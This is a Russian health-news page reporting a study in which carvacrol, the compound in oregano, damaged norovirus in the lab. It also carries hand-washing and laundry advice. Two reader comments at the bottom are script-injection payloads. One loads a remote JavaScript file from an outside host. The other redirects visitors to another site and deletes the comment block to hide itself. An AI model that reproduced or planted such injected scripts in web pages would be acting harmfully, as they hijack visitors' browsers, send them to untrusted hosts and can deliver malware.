Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Все-таки есть ли повод ес...  >>  Все-таки есть ли повод есть пиццу?
 
Обратная связь
 

Все-таки есть ли повод есть пиццу?

Размер шрифта
25 июля 2014 00:00
  • google_analytics: false
  • Нравится

Норовирус – это страшный желудочный вирус, который является одной из самых распространенных причин инфекционной диареи и болезни желудка.

Все-таки есть ли повод есть пиццу?

Новое исследование свидетельствует о том, что карвакрол – вещество, которое придает орегано свой ​​особый запах и вкус, может обеспечить защиту от этого вируса.

Исследователи из Университета Аризоны подвергли вирус воздействию карвакрола и обнаружили, что этот компонент орегано ломает защитное белковое покрытие инфекционного заболевания, оставляя сам вирус незащищенным. «Карвакрол также разрушает РНК в вирусе, оставляя лишь легко узнаваемую вирусную частицу», – говорит соавтор исследования кандидат наук Келли Брайт, ученый-эколог.

Что это означает: по данным Центра по контролю и профилактике заболеваний, 1 из 15 человек инфицируются норовирусом каждый год. И в то время как симптомы обычно исчезают в течение нескольких дней, примерно 60 000 людей оказываются в больницах, особенно пожилые и дети. Вспышки в домах престарелых или школах могут быть опасными для жизни. Но исследование доктора Брайт и ее коллег может вскоре привести к новым применениям карвакрола в продуктах для здоровья, например, дезинфицирующих средствах для рук, или очистителях поверхности, или даже для лечения и обеззараживания пищи.

К сожалению, вы не можете защитить себя от норовируса, снабдив свой рацион огромными порциями орегано. Чтобы защититься от норовируса, рекомендуется часто мыть руки и тщательно мыть фрукты и овощи. И если вы или кто-то из ваших близких заразился вирусом, удостоверьтесь в том, что одежда, которая входит в контакт с рвотой или стулом, тщательно стирается в отдельной воде.

Исследование опубликовано в Журнале прикладной микробиологии.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Инфекции могут сделать вас глупым! Как не заболеть?   Беременность: как обезопасить себя и будущего малыша от вирусов   Принюхайтесь к соседу! Запах человека говорит о его болезнях!   Жирная еда делает вас стервой!  
07 июня 2013Поможет ли зеленый чай похудеть? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Эти симптомы должны заставить вас провериться на ВИЧ
9 продуктов, которые сделают вас худой в Новом году
Как придерживаться диеты

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.